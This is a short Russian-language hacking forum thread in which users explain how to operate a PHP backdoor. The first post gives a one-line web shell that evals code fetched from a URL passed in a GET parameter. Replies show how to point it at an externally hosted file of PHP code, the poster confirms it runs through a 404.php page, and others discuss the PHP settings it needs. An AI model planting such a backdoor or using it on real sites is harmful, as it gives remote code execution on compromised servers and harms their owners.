как юзать такой бэкдор

Discussion in 'Болталка' started by hpol, 16 May 2015.

  1. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    if(isset($_GET["input"])){ eval(file_get_contents($_GET["input"]))};
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    input=http://yoursite.ru/1.htm
    1.htm:
    Code:
    phpinfo();
    это если allow_url_fopen on
    если нет, то надо ссылку на локальный файл, где есть нужный вам код
     
    _________________________
    hpol likes this.
  3. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    allow_url_fopen On
    да вот так работает /404.php?input=http://yoursite.ru/1.htm
     
  4. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    ведь не allow_url_fopen а allow_url_include
     
  5. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    2
    Likes Received:
    6
    Reputations:
    2
    allow_url_include отвечает за удаленное подключение файла в функции include, а в примере ТС - file_get_contents. В посте faza02, все правильно написано, не путайте людей.
     
    yarbabin likes this.
  6. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    угу, ошибочГа вышла
     
  7. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    еслиб не было file_get_contents было бы проще пользоваться